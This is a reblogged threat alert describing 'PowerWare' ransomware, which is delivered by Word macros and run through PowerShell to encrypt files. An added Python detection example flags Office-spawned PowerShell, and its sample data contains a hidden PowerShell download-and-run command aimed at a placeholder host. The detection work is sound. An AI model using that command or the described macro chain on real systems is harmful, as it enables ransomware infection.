
“PowerWare,” New Ransomware Written in PowerShell, Targets Organizations via Microsoft Word

02/04/2016

https://www.carbonblack.com/2016/03/25/threat-alert-powerware-new-ransomware-written-in-powershell-targets-organizations-via-microsoft-word/

“PowerWare” is a new instance of ransomware that uses tools native to the operating system, in this case PowerShell. “Traditional” ransomware variants typically install new malicious files on the system, which in some instances can be easier to detect. “PowerWare” instead asks PowerShell, a core utility of current Windows systems, to do the dirty work. By leveraging PowerShell, this ransomware attempts to avoid writing new files to disk and tries to blend in with legitimate computer activity.

For the “PowerWare” test sample we ran, we opened a “malicious” Word document.

[Screenshot: the malicious Word document]

In this example, if the user enables macros, cmd.exe is spawned to launch two instances of PowerShell: one that downloads the ransomware script and another that starts PowerShell with that script as its input.

[Screenshot: PowerWare macro code]

The process tree, with its command lines, is shown in the screenshot below:

[Screenshot: process tree and command line]
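As an added detection example (not Carbon Black's code and not taken from the PowerWare sample), the following Python flags the chain described above, Word launching cmd.exe which launches PowerShell, in constructed Sysmon-style process-creation records; the field names, command-line patterns, sample events and placeholder URL are all assumptions.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name as logged, e.g. "powershell.exe"
    cmdline: str    # full command line as logged

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Illustrative command-line indicators, not an exhaustive PowerWare signature.
DOWNLOAD_RE = re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I)
HIDDEN_RE = re.compile(r"-nop\b|-NoProfile|-w(indowstyle)?\s+hidden|-(ep|ExecutionPolicy)\s+bypass", re.I)

def ancestors(ev, by_pid):
    """Yield parent, grandparent, ... of ev until the chain leaves the event set."""
    cur = by_pid.get(ev.ppid)
    while cur is not None:
        yield cur
        cur = by_pid.get(cur.ppid)

def detect_office_to_powershell(events):
    """Return [(pid, reason)] for every powershell.exe with an Office app among its ancestors."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if ev.image.lower() != "powershell.exe":
            continue
        chain = [a.image.lower() for a in ancestors(ev, by_pid)]
        if not OFFICE & set(chain):
            continue   # PowerShell started by a shell or admin tool: not this pattern
        reasons = ["PowerShell under " + next(c for c in chain if c in OFFICE)]
        if "cmd.exe" in chain:
            reasons.append("launched via cmd.exe")
        if DOWNLOAD_RE.search(ev.cmdline):
            reasons.append("remote download in command line")
        if HIDDEN_RE.search(ev.cmdline):
            reasons.append("hidden/no-profile/bypass flags")
        hits.append((ev.pid, "; ".join(reasons)))
    return hits

# Constructed sample telemetry, not real PowerWare data; the URL is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "WINWORD.EXE", '"WINWORD.EXE" invoice.doc'),
    ProcEvent(300, 200, "cmd.exe", "cmd /c powershell ... | powershell -"),
    ProcEvent(301, 300, "powershell.exe", "powershell -nop -w hidden (New-Object Net.WebClient)"
              ".DownloadString('http://PLACEHOLDER.example/script')"),
    ProcEvent(302, 300, "powershell.exe", "powershell -"),          # second instance, script on stdin
    ProcEvent(400, 100, "powershell.exe", "powershell -NoProfile Get-ChildItem C:\\"),  # admin use
]
```

The event with pid 400 carries a suspicious flag but no Office ancestor, so it is not reported; both PowerShell children of the cmd.exe under WINWORD.EXE are.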

Below is a snippet of the “PowerWare” script. In the first few lines, it generates random numbers used to compute the encryption key and the UUID assigned to this endpoint. Then the URL to post the key to is defined, and this information is sent to the attacker-controlled host over HTTP, in plain text.

[Screenshot: PowerWare script snippet]

Next come the commands that create the actual encryption key, the initialization vector, and the other crypto parameters.

Finally, the script goes through the file system, encrypting every file with a given extension (extensions noted below).

The attackers also drop an HTML file named FILES_ENCRYPTED-READ_ME.HTML into every folder in which a file was encrypted, detailing how an affected user can get their files back.

[Screenshot: FILES_ENCRYPTED-READ_ME.HTML ransom note]

Indicators of Compromise

File Details

[Image: file details]

Network Details

[Image: network details]


One Comment
  1. Reblogged this on TheFlippinTruth.